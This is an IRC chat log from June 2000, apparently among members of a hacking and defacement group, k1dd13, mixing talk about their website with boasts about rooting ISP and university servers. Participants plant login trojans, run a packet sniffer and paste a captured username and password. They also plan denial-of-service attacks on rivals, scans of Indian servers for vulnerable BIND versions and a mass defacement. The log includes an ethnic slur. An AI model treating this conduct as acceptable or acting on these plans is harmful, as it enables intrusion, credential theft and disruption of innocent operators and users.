d0kies :D1ck :i will have to ftp, i`ll send u at night ok? :J4n3 :hmm okies, i'm gonna sploit linux boxes of edu :D1ck :oki dokies :D1ck :brb booting :D1ck :to win :D1ck :g0ne :J4n3 :kkz :m4ry :D1ck :m4ry :you there? :Sp07 : :D1ck :hi :D1ck :i`m gonna be posting k1dd13's site :D1ck :soon :D1ck ::) :D1ck :J4n3 :D1ck :miller send me that web.tar.gz :D1ck :;) :Sp07 :oh :D1ck :i want some one with good writing skillz :D1ck ::/ :D1ck :to write About, FAQ :D1ck :etc :D1ck ::) :D1ck :Sp07 :D1ck :hmm :D1ck :PLAYING GAMEs? :Sp07 :nope :Sp07 :going to ergister a chanenl :Sp07 :sdgf :D1ck :hHAHAHAHAH :D1ck :ok :Sp07 : :Sp07 :I should make a game.tcl :Sp07 :thingy :Sp07 :majigger :D1ck :haha :Sp07 :somthinge :Sp07 :cool :Sp07 :how about portscan tcl :Sp07 :I want to make something new :D1ck :tell me :D1ck :is this para write for About :D1ck :? :D1ck :K1dd13 came into existance almost a year ago. It was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir. It was precipitated to bring the attention of world leaders and :Sp07 :? :D1ck :organizations to the issue in cyberspace which is today the leading source of communication. :D1ck :is that fair enuff? :Sp07 :eyah I guess :Sp07 :I thought it was like a hacking group :Sp07 :hehe :Sp07 :not some terrorist group :D1ck :what should i add. :D1ck :? :D1ck :it is a hacking :D1ck :group :D1ck :but :D1ck :hahahahaa :D1ck :man u dont know kashmir :D1ck :if u see the pictures :D1ck :anyway :D1ck :what else should i add. :D1ck :? :Sp07 :add some pornh :D1ck :hha :Sp07 :what is lahore ? :D1ck :lahore==city :D1ck :Sp07 give me a good quote :Sp07 :I thought it was the whore in french :Sp07 :ill go get a quote fo you :D1ck :heh :D1ck :ok :Sp07 :I dont know any in my ehad :Sp07 :hea :Sp07 :d :Sp07 :Silence is gold, if nothing better you hold. :Sp07 :tahts gay :Sp07 :I heard a quote before :Sp07 :goes something like "If you want peace, you must prepare for war" :Sp07 :I herad it in a simpsons episode :Sp07 :name = Stone Cold :Sp07 :e-mail = ** :Sp07 :homepage = ** :Sp07 :town = ?? :Sp07 :country = ?? :Sp07 :Quote = Don't bring a knife to a gun fight :Sp07 :hahahaa :Sp07 :"Never flush the toilet while taking a shower." :Sp07 :how about Famous Last Words :Sp07 :-- Abraham Lincoln :Sp07 : A house divided against itself cannot stand. :Sp07 : The Bible is not my book, and Christianity is not my religion. I could never give assent to the long, :Sp07 : complicated statements of Christian dogma. :Sp07 : You can fool all the people some of the time, and some of the people all the time, but you cannot fool all :Sp07 : the people all the time. :Sp07 : My great concern is not whether you have failed, but whether you are content with your failure. :Sp07 : :Sp07 :Nearly all men can stand adversity, but if you want to test a man's character, give him power. :Sp07 : Better to remain silent and be thought a fool then to speak out and remove all doubt. :Sp07 : Things may come to those who wait, but only the things left by those who hustle. :Sp07 : Most people are about as happy as they make up their minds to be. :Sp07 : Tact is the ability to describe others as they see themselves. :Sp07 : He has the right to criticize who has the heart to help. :Sp07 : :Sp07 :I destroy my enemy when I make him my friend. :Sp07 :While one person hesitates because he feels inferior, the other is busy making mistakes and becoming :Sp07 : superior. :Sp07 :New opinions are always suspected, and usually opposed, without any other reason but because they :Sp07 : are not already common. :D1ck :hehe :Sp07 :-- Jay Leno :Sp07 : If God doesn't destroy Hollywood Boulevard, he owes Sodom and Gomorrah an apology. :Sp07 :If you want truly to understand something, try to change it. :Sp07 :teghres lots of quotes :Sp07 :I ilke lincolns quotes :Sp07 :-- Julius Caesar :Sp07 : I came, I saw, I conquered. :Sp07 :thats me :D1ck :hahah :D1ck :J4n3 :D1ck :when u come bak, message me it's important. :D1ck :wtf :D1ck :? :D1ck :J4n3 :D1ck :J4n3 :D1ck :J4n3 :D1ck :Sp07 :D1ck :make me a gRaF|X :D1ck :http://www9.example.com/k1dd13/' :Sp07 :send me photoshop and I will do it :Sp07 :hehe :D1ck :h3h :Sp07 :let me go check out the website :D1ck :(Sp07): let me go check out the website :D1ck :*** Disconnected :D1ck :*** Rejoined channel :D1ck :what did u say after that :Sp07 :? :Sp07 :nothing :D1ck :u like the site :D1ck :what wil u give it out of 10 :D1ck :? :D1ck :1 :D1ck :? :D1ck :2 :D1ck :? :D1ck :3? :D1ck :0? :Sp07 :.654564 :Sp07 :hheh :Sp07 :its ok :D1ck ::( :Sp07 :it would be better if it wasnt on a free web thingy :Sp07 :www.k1dd13.com :Sp07 :or something :D1ck :yep :D1ck :i`m getting it :D1ck :k1dd13-online.org :D1ck :www.k1dd13-online.org :D1ck :it's under construction dude :D1ck ::P :D1ck :tons of typos :D1ck :needs tons of graphic :D1ck :needs tons of graphics :D1ck ::) :Sp07 :oh :D1ck :have to pout perl scripts :D1ck :tools :D1ck :archieve :D1ck :tons of work :D1ck ::; :D1ck ::;/ :Sp07 :want to make a website for me :Sp07 :? :Sp07 :DICKWAD :D1ck :heh :Sp07 :hehe :D1ck :nO :Sp07 :potheads.net :D1ck :it's hard :D1ck :plus i`m getting it made:) :Sp07 :=( :D1ck :=( :Sp07 :any new exploits for redhat 6.1? :Sp07 :in the last month or so? :Sp07 :I just want to root my friends server so I can make my vhost since hes not doing it :D1ck :lol :Sp07 :nb :Sp07 :hey :Sp07 :Im making an internet search tcl :_-Ahsan-_ :LOL :_-Ahsan-_ :was were -=- Day 03 June 6 :D1ck! :s3ga shit * * :D1ck! :s3ga shit * * :D1ck! :s3ga rshit * * :D1ck! :s3ga rshit * * :D1ck! :s3ga rshit * * :D1ck! :s3ga shit * * :D1ck! :s3ga shit * * :D1ck! :s3ga rshit * * :D1ck! :.shit * * :D1ck! :.shit * * :D1ck! :s3ga help shit :D1ck! :.shit * * :D1ck! :back :D1ck! :J4n3 :D1ck! :u there? :D1ck! :J4n3: WHNE U COME BACK, msg ME , it's important :D1ck! :J4n3: WHNE U COME BACK, msg ME , it's important :D1ck! :J4n3: WHNE U COME BACK, msg ME , it's important :J4n3! :D1ck ma back :D1ck! :mah bOy :D1ck! :mah bOy :D1ck! :mah bOy :D1ck! :done graph1x? :J4n3! :graphix tho already hain, i'm workin on that java and password cgi :J4n3! :downloaded too many scripts, and expermenting with them :J4n3! :hey d1ck wanted to ask u something :D1ck! :oki :J4n3! :tomorrow thak page ready hojayega with graphics java and cgi password protected :J4n3! :ok listen ek system aisa hai kay jo sploits page hoga uska name password hoga :J4n3! :i mean if page name is sploit898.html :J4n3! :that would be the pass :J4n3! :if someone click on sploits link :J4n3! :another window will appear :J4n3! :and it will ask for password :J4n3! :if someone know that html page name then it will go through :J4n3! :otherwise it wont :J4n3! :what u say ? :D1ck! :oh :D1ck! :welp :D1ck! :dunno u choose :D1ck! ::P :J4n3! :and yeah that banner change script be mila hai it will change at least 5 graphics :D1ck! :yep okies :D1ck! :cool :J4n3! :i mean 5 banners u can select it will change everytime :D1ck! :;) :J4n3! :heh its complicated workin with cgi and java :/ :D1ck! :hehe :D1ck! ::? :D1ck! ::/ :J4n3! :haha i like ur chat style :J4n3! ::? :J4n3! ::/ :J4n3! :hehe :J4n3! :tight :J4n3! :yaar that synflood is tight :J4n3! :u know some hackphreak guy took over deathace's nick 2 weeks ago :J4n3! :with his bot with ip * :D1ck! :YEP :D1ck! :yep in know i dossed him 2 times :D1ck! :he is linuxsex ka guy :D1ck! :;) :D1ck! :yup :J4n3! :hahah lol :J4n3! :i dossed him from 9 rewts :J4n3! :he went down for 7 hours :J4n3! :lol :J4n3! :all his domain example.com was down :D1ck! :wow :D1ck! :HAHAHAHAHAHAHAHA :D1ck! :kewl :D1ck! :;) :J4n3! :haha yeahh :J4n3! :i got his nick back u can see it in #k1dd13 :D1ck! :cool cool :D1ck! :;) :D1ck! :oye :D1ck! :attrition.org say saray mirror akathain karnay hain :D1ck! :attrition.org say saray mirror akathain karnay hain :D1ck! :yep :D1ck! :i see :J4n3! :ahaan no problem :J4n3! :ahaan no problem :J4n3! :karlaingay :J4n3! :yaar worldtel sux :J4n3! :it sux all the day only works fine in morning :( :D1ck! :*** D1ck changes topic to 'kipitipa nipamipa jipa sepa bah bah blah........' :D1ck! :(@J4n3): ahaan no problem :D1ck! :(@J4n3): karlaingay :D1ck! :*** Disconnected :D1ck! :*** Rejoined channel :D1ck! : :D1ck! : (#k1dd13) topic- 'kipitipa nipamipa jipa sepa bah bah blah........' :D1ck! : (#k1dd13) topic- set by D1ck (Tue 6th Jun 2000 10:03p) :D1ck! :HAFEZ :D1ck! :world TEL sucks :D1ck! : :D1ck! :wOrlDtEl suXx :J4n3! :yeah yeah yeah :J4n3! :it does :J4n3! :it does :J4n3! ::( :J4n3! ::( :J4n3! ::/ :J4n3! :only rox in morning :J4n3! :sux all the day :D1ck! :hahahaha :D1ck! :hmmmmmmmmmm :D1ck! :hehe :D1ck! :http://www9.example.com/k1dd13/Article3.html :D1ck! :send me the graphix.jpg :D1ck! ::) :D1ck! :the elite 'K1dd13 Online' one :J4n3! ::/ :J4n3! :satnet is lot better yaar :J4n3! :it only sux in night e or r hours :J4n3! :errr i made only of THE K1dd13 :/ :J4n3! :oye tell me how do i mount my drive d ? :D1ck! :http://www9.example.com/k1dd13/Article3.html :D1ck! :d: :D1ck! :? :J4n3! :hmmm let me check :D1ck! :mount /mnt/cdrom :J4n3! :yaar drive d :D1ck! :mount -t msdos /dev/fd0 /mnt/floppy :J4n3! :no no :D1ck! :mount -t vfat /dev/hda1 /mnt/win :J4n3! :for mounting drive c i write mount -t msdos /dev/hda1 /mnt :D1ck! :? :D1ck! :cd :D1ck! :(@J4n3): for mounting drive c i write mount -t msdos /dev/hda1 /mnt :D1ck! :i write :D1ck! :mount -t vfat /dev/hda1 /heh :J4n3! :i have partitions c d and e :J4n3! :by using above command it mount drive c but not d and e , cd is drive g :D1ck! :mkdir hh :D1ck! :mkdir heh :J4n3! :heh but it works :D1ck! :hahaha :D1ck! :ok :D1ck! :i know :D1ck! :do this 'df' :D1ck! :and paste me :D1ck! :and then df -k :J4n3! :wait :J4n3! :Filesystem 1k-blocks Used Available Use% Mounted on :D1ck! :what is yure d? /dev/hda2? :D1ck! :what is yure d? /dev/dba1 :D1ck! :? :J4n3! :.Filesystem 1k-blocks Used Available Use% Mounted on :J4n3! :./dev/hda8 1935132 878956 957780 48% / :J4n3! :./dev/hda7 23302 2650 19449 12% /boot :J4n3! :./dev/hda1 2064032 1230496 833536 60% /mnt :D1ck! :oki :D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win :D1ck! :wait, what is /dev/hda7 :D1ck! :? :J4n3! :linux swap partition :D1ck! :ok :D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win :J4n3! :hda8 is native :D1ck! :do this and tell me what u get :D1ck! :yep yep :J4n3! :[root@example portedfor]# mkdir /win; mount -t vfat /dev/hda2 /win :J4n3! :[MS-DOS FS Rel. 12,FAT 0,check=n,conv=b,uid=0,gid=0,umask=022,bmap] :J4n3! :[me=0x0,cs=0,#f=0,fs=0,fl=0,ds=0,de=0,data=0,se=0,ts=0,ls=0,rc=0,fc=4294967295] :J4n3! :Transaction block size = 512 :J4n3! :VFS: Can't find a valid MSDOS filesystem on dev 03:02. :J4n3! :mount: wrong fs type, bad option, bad superblock on /dev/hda2, :J4n3! : or too many mounted file systems :J4n3! : (aren't you trying to mount an extended partition, :J4n3! : instead of some logical partition inside?) :D1ck! :hmm :D1ck! :u have to know what is yure d: :D1ck! :c == /dev/hda1 :D1ck! :d == /dev/???/ :D1ck! :dba1 :D1ck! :hda1 :D1ck! :etc :J4n3! :hmmm /dev/hda2 i think :D1ck! :oye brb booting to linux :J4n3! :ok :D1ck! :then it should mount :D1ck! :oye brb booting to linux :D1ck! :oye brb booting to linux :J4n3! :so bol raha hon :D1ck! :yo :D1ck! :back :D1ck! :J4n3 :D1ck! :there? :D1ck! : [Lag 156] :J4n3! :yaar neechay gaya huwa tha :D1ck! :fuck :D1ck! :worldtel sux :D1ck! :oh god :D1ck! :welp :D1ck! :i`m fucking lagged :D1ck! :Inspectah :D1ck! :w00p :D1ck! :sup dis :Sp07! :hving trouble making this tcl script and nobody has a brain to help me :D1ck! :hehe :D1ck! :tell me some thing to code :D1ck! :man :D1ck! :worldtel sucks :D1ck! :Sp07 :Sp07! :? :Sp07! :d1ck :Sp07! :d1ck :D1ck! :supa boh :D1ck! :man :D1ck! :IRIX :Sp07! :? :D1ck! :u have a scanner for IRIX? :Sp07! :nope :D1ck! :i wana own boxes with object-something.c :D1ck! ::) :Sp07! :object-something? :Sp07! :umm just use solaris or linux box to scan :D1ck! :heh :D1ck! :yeah :D1ck! :i forgot that name :D1ck! :how did u own that IRIX box? :D1ck! :no to scan :D1ck! :i wana own IRIX :D1ck! :i need boxes to own ;) :Sp07! :I dont remember :Sp07! :delta something something.edu :Sp07! :heh :Sp07! :iit.edu :D1ck! :k :Sp07! :just scan from redhat :Sp07! :doesnt matter where you scan from :D1ck! :hehe yep :Sp07! :why the fuck are they letting taddpole in linuxsex :Sp07! :hehe :D1ck! :no no :Sp07! :are they trying to suck oper dick or something? :D1ck! :err, i know that dude :D1ck! :i want IRIX boxes address so i can ./own irix-box-address.com :D1ck! :Hahahhahah :D1ck! :dunno :D1ck! :i was wondering :Sp07! :oh :D1ck! ::) :Sp07! :I dont think every irix box is vulnerable :Sp07! :heh :Sp07! :what port does it connect to? :Sp07! :kcnet.org = irix :D1ck! :(@Sp07): I dont think every irix box is vulnerable :D1ck! :(@Sp07): heh :D1ck! :*** Disconnected :D1ck! :*** Rejoined channel :D1ck! :fuck :D1ck! :my isp :Sp07! :[03:21] heh :Sp07! :[03:22] what port does it co :Sp07! :[03:22] what port does it connect to? :Sp07! :[03:22] example.org = irix :D1ck! :(@kurupto0n): anyone have a remote root sploit for sendmail 8.9.3? :D1ck! :hahaha :D1ck! :i`m looking for it,;) :D1ck! :[03:18] *** Warning- Over 30 sec lag to self :D1ck! :[03:19] *** Warning- Over 60 sec lag to self :Sp07! :haha :Sp07! :WARNING WARNING :Sp07! :afk me go play games :D1ck! :Sp07 :Sp07! :? :Sp07! :I just kicked some ASS :D1ck! :Sp07 :D1ck! :u there? :Sp07! :yes :D1ck! :did u see h4r33 EOF ;)? :D1ck! :HAHAHAHAHHA :D1ck! :he's ultra lame :D1ck! ::P :Sp07! :yeah :D1ck! :lol :D1ck! :kill -9 9394 :D1ck! :pid of 'bnc' :Sp07! :uh hehe :Sp07! :why dont you sniff all the shit he does on irc :Sp07! :and spy on him :Sp07! :get his passwords :D1ck! :hmmmm :D1ck! :cna i do that? :Sp07! :yeah :D1ck! :if yes then how? :D1ck! :i have sniffer :Sp07! :hes using that shell as a bounce right? :Sp07! :sniff the port :D1ck! :on the box :Sp07! :that he uses :Sp07! :heh :D1ck! :./sniff -d 8000 :D1ck! :errr :D1ck! :how? :Sp07! :uhh :Sp07! :find out the port number :Sp07! :then sniff it :Sp07! :with your sniffer :D1ck! :thats a good idea :Sp07! :=D :Sp07! :I think that will work :Sp07! :never tried it :D1ck! :fuck i trojanned the box and removed his 'trojan' :D1ck! :HAHAHA :D1ck! :oh :Sp07! :either sniff the port :Sp07! :or sniff everything going out to the irc server :D1ck! :motos# ./sniff-100mb -help :D1ck! :Usage: ./sniff-100mb [-d x] [-s] [-f] [-l] [-t] [-i interface] [-o file] :D1ck! : -d int set new data limit (128 default) :D1ck! : -s filter out smtp connections :D1ck! : -f filter out ftp connections :D1ck! : -l filter out rlogin/rsh connections :D1ck! : -t filter out telnet connections :D1ck! : -o output to :D1ck! :heh :Sp07! :use a different sniffer heh :D1ck! :lol :Sp07! :use sniffit :D1ck! :they arnt many for sun :Sp07! :sniffit :D1ck! :hmmmm :D1ck! :oh yeah :Sp07! :forgot where to get it :D1ck! :sniffit :D1ck! : :D1ck! :get me a binary :D1ck! :motos# cc :D1ck! :gcc :D1ck! :motos# gcc: Command not found :D1ck! :./usr/ucb/cc: language optional software package not installed :D1ck! :.ghay boxens :Sp07! :haha :D1ck! :;/ :D1ck! : grid (~grid@example.net :D1ck! :that fucking packet m0nk :D1ck! :hehe :Sp07! :? :D1ck! :hahahaha :D1ck! :nevah mind :Sp07! :brass monkey :D1ck! :u master badah :D1ck! :hehee :Sp07! :that funky monkey :D1ck! :lol :D1ck! :heh :D1ck! :that roxer muh nipples :D1ck! :man :D1ck! :hmmm :D1ck! :give me access to a red hat box (local)_ :D1ck! :i`ll rewt it :D1ck! :u know what i did yesterday? :D1ck! :echo "some-ip" > roots.txt :D1ck! ::/ :D1ck! :and i lost most ip's like before :D1ck! :i was h1gh :Sp07! :heh :Sp07! :I dont have anymore accounts except legal ones :Sp07! :heh :D1ck! :heh :D1ck! :ok :Sp07! :well actually I still have some :Sp07! :but I will hold on to them :D1ck! :ok;) :D1ck! :what IRIX box u just mentioned? :Sp07! :example.org :Sp07! :is irix :Sp07! :I had like 3 accounts there :Sp07! :and for some reason they all got canceled :Sp07! :what are some isps that allow shell access? :Sp07! :I wanna root some isps :Sp07! :whys that fag taddpole keep joining linuxsex :Sp07! :dos him :Sp07! :hehe :Sp07! :do /whois Sp07 :Sp07! :im cool :Sp07! :I got +v in #example :Sp07! :heh :D1ck! :heh :D1ck! :J4n3 :Sp07! :damn my v went away :D1ck! :v? :D1ck! :huh :J4n3! :D1ck :Sp07! :+ :D1ck! :sup J4n3 :D1ck! :hahahhaha :D1ck! :lol :J4n3! :nuffin much :p u ? :D1ck! :nadda :D1ck! :masterbation,etc :D1ck! :and analing Sp07 :J4n3! :heh :J4n3! :all about sex :p :D1ck! :;) :Sp07! :uhhhhh :D1ck! :i just tookover 3 of diz's box today ;( :D1ck! :one day i did 36 :Sp07! :suck it :D1ck! :heh :D1ck! :*ALL* his boxes :J4n3! :woo :D1ck! :Sp07 :D1ck! :hmmmmmm :D1ck! :um :Sp07! :? :D1ck! :J4n3: who'se domain example.com is? :D1ck! :and who host's it :D1ck! :satnet called up zahid eh :J4n3! :donno about it but know who own it :J4n3! :its a friend :D1ck! : /msg Sp07 man anal me :D1ck! :oooops :D1ck! :who? :D1ck! :hmmmm :J4n3! :i gave him sat file to publ1sh :D1ck! :n1ck? :D1ck! :oh cool :J4n3! :Zolo :D1ck! ::) :J4n3! :;) :D1ck! :hehe k :J4n3! :z33sh4n :D1ck! :ah :D1ck! :that a boy :D1ck! ::P) :D1ck! :zmasterz ? :J4n3! :they called zahid ? :D1ck! :u know that guy Sp07 :D1ck! :J4n3 yeah :Sp07! :yeah :D1ck! :k :J4n3! :about what ?? whay they said ? :D1ck! :i dunno :Sp07! :they wanted to suck my dick :Sp07! :but I turned them down :Sp07! :sorry :D1ck! :J4n3 : they were blaming a guy that he gave miller access and miller defaced.. :D1ck! :HAHAHAHAA :J4n3! :LOOOOOL :D1ck! :Sp07 :D1ck! :wat was that IRIX box :D1ck! :not the .edu :D1ck! :the other one u gave me to ./own :D1ck! :? :Sp07! :kcnet.org :D1ck! :k :D1ck! :Sp07: u have a IRIX, root kit u could send? :Sp07! :no :Sp07! :I just used bj :Sp07! :the login trojan :D1ck! :oh :D1ck! :k :D1ck! :send me bj.c :D1ck! :i lost mine :D1ck! : :Sp07! :uh :Sp07! :I dont have anything :Sp07! :hehe :D1ck! :heh oh :D1ck! :u gave up hacking :D1ck! : :Sp07! :something like that :Sp07! :sooner or later im gonna get arrested it :Sp07! :so I stopped :D1ck! :oh :D1ck! :ok :Sp07! :and its not making me any money so its pointless :D1ck! :i will NEVER GET ARRESTED :Sp07! :I want to start up my own web hosting server :D1ck! :cOzM y coUnTrY KiKs AsS :D1ck! :ahahah :D1ck! :oh :Sp07! :We GoT HaMBuRgErS iN My CUnTrY :Sp07! :hehehe :D1ck! :heh :D1ck! :IBM AIX Version 4.x for RISC System/6000 :D1ck! :(C) Copyrights by IBM and by others 1982, 1996. :D1ck! :Access and use restricted to authorized individuals. :D1ck! :cub login: :D1ck! : /* Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2, */ :D1ck! :fuck :Sp07! :heh :D1ck! : ;p :Sp07! :what time is it in pakiland? :Sp07! : nm :Sp07! : /~\/~\ :Sp07! :tittiies :Sp07! : . . :Sp07! :/~\/~\ :Sp07! :titties :D1ck! :hmmmmmmm :D1ck! :6 am :Sp07! : , , :Sp07! :/~\/~\ :D1ck! :Entering proxyloop.. :D1ck! :fuck :D1ck! :;) :D1ck! :uid=0(root) gid=0(root) :D1ck! :*sigh* :Sp07! :woohoOO :Sp07! :YipPpepEEeee :Sp07! :damn :Sp07! :it is hot in here :D1ck! :hehe :Sp07! :is it hot in here or is it just you? :Sp07! :is that a banana in your pocket or are you just happy to see me :D1ck! :its hot :Sp07! :hehe :Sp07! :im bored :Sp07! :yes that is a 10 foot banana in my pocket :D1ck! :i`ll eat halwa puri :D1ck! :its tasty tasy breakfast in pakistan :D1ck! :u get it for $2 :D1ck! :or $1 :D1ck! :J4n3 janies :D1ck! :scan for bind 8.2 :D1ck! :8.2.1 :D1ck! :HELLO :D1ck! :Sp07 :D1ck! :a/s/; :D1ck! :a/s/l :D1ck! :a/s/l :D1ck! :i`m hot dude :D1ck! : :D1ck! :calcuta :D1ck! :INDIAN :D1ck! :wana chat? :Sp07! :? :D1ck! :sand nigger :D1ck! :heh :Sp07! :343/sdfdf/9sdf90d7fs :D1ck! :HAHAHAHHHAHA :D1ck! :i remember the days when i use to go to msdos and type ping ip :D1ck! :and 'laG' it :D1ck! :hahaha :D1ck! :72 months back :D1ck! :w00p :D1ck! :HAFEEEEEEEEEZ :D1ck! :zoooooooooooooom owned :D1ck! :HAFEEEEEEEZ :D1ck! :HAFEEEEEEEZ :D1ck! :HAFEEEEEEEZ :D1ck! :50,00 passwords :D1ck! :50,00 passwords :Sp07! :? :Sp07! :50,00? :Sp07! :hehe :D1ck! :yeah man :D1ck! :local isp's ns :D1ck! :hehe :D1ck! :I HATE TO OWN :Sp07! :heh :D1ck! :coz then :D1ck! :i have to trojan :D1ck! :hehhe :D1ck! :i have to trojan before the wake up :Sp07! :free internet accesss :Sp07! :hehe :Sp07! :for you and your friends :Sp07! :try to own earthlink.net :Sp07! :or pacbell :Sp07! :hehe :D1ck! :haha yep :D1ck! :we dont have earthlink :D1ck! :man :D1ck! :i have 0 NT skillz :D1ck! :teach me NT :Sp07! :?> :D1ck! :nt :Sp07! :I dont have nt :Sp07! :I dont exploit NT :D1ck! :same here./ :Sp07! :almost dinner time :Sp07! :I am starving man :D1ck! :hehe :D1ck! :same here. :Sp07! :uhhhhhhhhhhuhuhuuhu :Sp07! :afk :Sp07! :tv time :J4n3! :D1ck :J4n3! :back from sex ;p :D1ck! :hahhaa :D1ck! :examplenet owned :D1ck! :main server :J4n3! :haahh :J4n3! :kewl :J4n3! :u got it again :D1ck! :no :D1ck! :this is new one :J4n3! :huh reallY ? :J4n3! :trojaned ? :D1ck! :yeah :D1ck! :send me root/owned :D1ck! :send me root/owned :J4n3! :wait :D1ck! :or some other u have :D1ck! :192.168.232.173 => 192.168.129.21 [110] :D1ck! :USER wajahatz :D1ck! :PASS fwjs :J4n3! :hahah sniffed already ? :D1ck! :yep :D1ck! :;) :D1ck! :i`m fast :D1ck! :hehe :J4n3! :kewl :p :D1ck! :what is linux.tar? :J4n3! :send me a file yaar :J4n3! :owned login trj :D1ck! :hehe it has one pass :D1ck! :the one i pasted :D1ck! :;/ :J4n3! :lol :D1ck! :;p :J4n3! :ye haal hogaya hai example ka :/ :J4n3! :it must be mail account :D1ck! :lol :J4n3! :they checked it from worldtel :D1ck! :yep :J4n3! :D1ck i have another login trj same like this but different pass :D1ck! :send me :D1ck! :HURRY :D1ck! :HURRY :D1ck! :they will wake and find out :D1ck! : :J4n3! :its on my shell :D1ck! :ok :J4n3! :download it from there :D1ck! : /msg :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :J4n3! :Pvamu nick immi :J4n3! :hiall abi aayegee and she'll get killed by server :p -=- Day 04 June 7 :D1ck! : i even have a legit box t3 | paying 800 per month for it | its a auth ns watch me in a week with my i :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck! :y0h :D1ck! :worldtel simply :D1ck! :sux :J4n3! :y0 y0 :J4n3! :sure it does :D1ck! ::/ :J4n3! ::\ :J4n3! :4 mb bandwith :/ :D1ck! :i`m usn\ing my bro's webnet :D1ck! ::) :D1ck! :it rox :J4n3! :it only works fine after 3 am to 10 am :D1ck! : mb my ass :D1ck! : mb my ass :D1ck! :4 mb my ass :D1ck! :HAHAHAHAHA :J4n3! :hmmmmm :/ :D1ck! :lol :D1ck! : it only works fine after 3 am to 10 am :J4n3! :satnet laaak darjay acha hai yaar is say "satnet is 100000 times better than this" :D1ck! :any isp does :D1ck! :rofl :D1ck! :satnet rox :J4n3! :satnet only goes down from 10 pm to 1 am :J4n3! :other time it rox :D1ck! :true :J4n3! :l0st example ? :D1ck! :yep :J4n3! ::( :J4n3! :whois blue0 ? :D1ck! blue0 :Bitch-X BaBy :D1ck! :dunno :J4n3! :hmm :J4n3! :yaar ye bot be sub gayeb hain "dude these bots have all disappeared" :D1ck! :ehehe :J4n3! :j0e manhoos ka server he down hai :/ "j0e, wretch's server is down" :D1ck! :oh :D1ck! :lol :D1ck! :how come? :J4n3! :hehe those bot rox :J4n3! :donno server resolve nahin horhaa :J4n3! :aur us say contact be nahin horaha "and it is not possible to contact him" :J4n3! :thakay poochon "ok ask" :J4n3! :wait lemme call :D1ck! :oh :D1ck! :may be he's caught? :D1ck! : may be he's caught? :J4n3! :hmmm :J4n3! :nope :J4n3! :wo bauth harami banda hia "he's a total bastard" :J4n3! :ithnee aasaani say nahi pakra jayega "he wont be caught so easily" :J4n3! :haha u know what ? :D1ck! :? :J4n3! :he once asked miller to add him in k1dd13 :D1ck! :lol :J4n3! :coz he's very close to miller :J4n3! :miller said ok :J4n3! :hehe :D1ck! :hahaha :D1ck! :oh then? :J4n3! :hah then donno he didn't come here :J4n3! : h1ghn3ss [~haris@hi-tech.example.net] has joined #karachi karachi is a city in pakistan - FYI :D1ck! :oye :D1ck! :[fuksnpr(~blue@adsl-example.net)] you worthless fucking script :D1ck! : kiddie pieces of shit :D1ck! :dos him :D1ck! :dos the fuck :D1ck! :dos the fuck out of adsl-example.net :J4n3! :heh :J4n3! :wait :D1ck! :ok :D1ck! :J4n3 :D1ck! :tell me more :D1ck! :oye :D1ck! :lets do a mass defacement operation :J4n3! :D1ck :D1ck! :J4n3 :J4n3! :fuck light's chali gayeen theen :( "fuck, there was a power cut, lights were off" :D1ck! :ehhee ok :J4n3! :D1ck world tel abi tight chal raha hai :PpPPp "world tel is still running tight" :D1ck! :hehe i`m on webnet :J4n3! :Nahin yaar abee tight chal raha hai "no dude, it is still running tight" :J4n3! :forun telnet fast working "immediate telnet, fast working" :J4n3! :no lag :p :J4n3! :yaar dos1ng is easy from windows yaar = dude :D1ck! :ofcourse :J4n3! :linux main banda confuse hojatha hai "In linux, a person gets confused" :D1ck! :yep :D1ck! :;) :J4n3! :lemm own sum 1nd1an b0x3s and bring more bots :p :D1ck! :oye :D1ck! :scan indian servers for bind :D1ck! :8.2 :D1ck! :and :D1ck! :8.2.1 :J4n3! :am on windows right now :J4n3! :i'll do it later and make a log of it :D1ck! :0h :D1ck! :okie :D1ck! :kewl :J4n3! :or wait lemme see if j0e's server is up :J4n3! :i'll do it from there :D1ck! :oki :D1ck! :aHAhahaha :D1ck! : oh ho :D1ck! : aaj tum vanila nahin anilaa lag rahi ho :D1ck! : undar say kurwi upar ssay chamkili :D1ck! :HAHAHAHAHAH :D1ck! :start par addd :D1ck! : :D1ck! :lol :J4n3! :hehe :D1ck! :hehee :J4n3! :ravi console Jun 7 20:30 (:0) :J4n3! :ravi pts/4 Jun 7 20:31 :J4n3! :ravi pts/5 Jun 7 20:31 :J4n3! :ravi pts/3 Jun 7 20:31 ( ) :J4n3! :ravi pts/6 Jun 7 20:31 :J4n3! :ravi pts/7 Jun 7 20:31 (:0.0) :J4n3! :ravi pts/8 Jun 7 20:31 (:0.0) :J4n3! :active hmm :D1ck! :hahahah :D1ck! :scan :D1ck! :scan :D1ck! :scan :D1ck! ::) :D1ck! :india*** :D1ck! ::P :J4n3! :hehe :J4n3! :******************************************************************************* :J4n3! : A T T E N T I O N :J4n3! :******************************************************************************* :J4n3! : YOU ARE REQUESTED TO RESHELVE THE BOOKS AFTER USE :J4n3! : SO THAT WE CAN MAINTAIN A CLEAN AND TIDY WORKING ENVIRONMENT :J4n3! : THANKING YOU FOR YOUR KIND CO-OPERATION :J4n3! :**************************************************** :J4n3! :ok sir :) :D1ck! :hahahaa :D1ck! :thanks:) :D1ck! :hehe :D1ck! :i`m so sleeeeeeeeepy :D1ck! :oye if i sleep i`ll be back till 3-4 :D1ck! :or 4-5- :D1ck! ::P :D1ck! :oye :D1ck! :windows? :D1ck! :get that webpage done :P :J4n3! :yeah :J4n3! :yeah Inshallah tonight :J4n3! ::) :J4n3! :oye wordtel daur raha hai hahaha very fast :p "yo world tel is running quite fast" :J4n3! :patha nahi kaisay chamatkaar hogaya :/ "dont know how the miracle occured" :J4n3! :Mashallah Mashallah "good lord, good lord" :J4n3! :kahin nazar na lag jaye kameenay ko "just hope the bastard doesnt get an evil eye" :J4n3! :D1ck :J4n3! :heh khamoshi of #pakistan dossed :p :D1ck! :? :D1ck! :why? :J4n3! :kisi aur ko karna hai ? "do you want to do anyone else?" :D1ck! :nope :J4n3! :coz i had a panga with its owner "because i had a quarrel with its owner" :J4n3! :tkx :D1ck! :dosing with out any reason :D1ck! :hehee :J4n3! :i dont go to channel pakistan anymore :D1ck! :oh :J4n3! :though i have access there still :J4n3! :yaar ek baath samaj nahi aatha "dude, i cant understand one thing" :D1ck! :THATS A 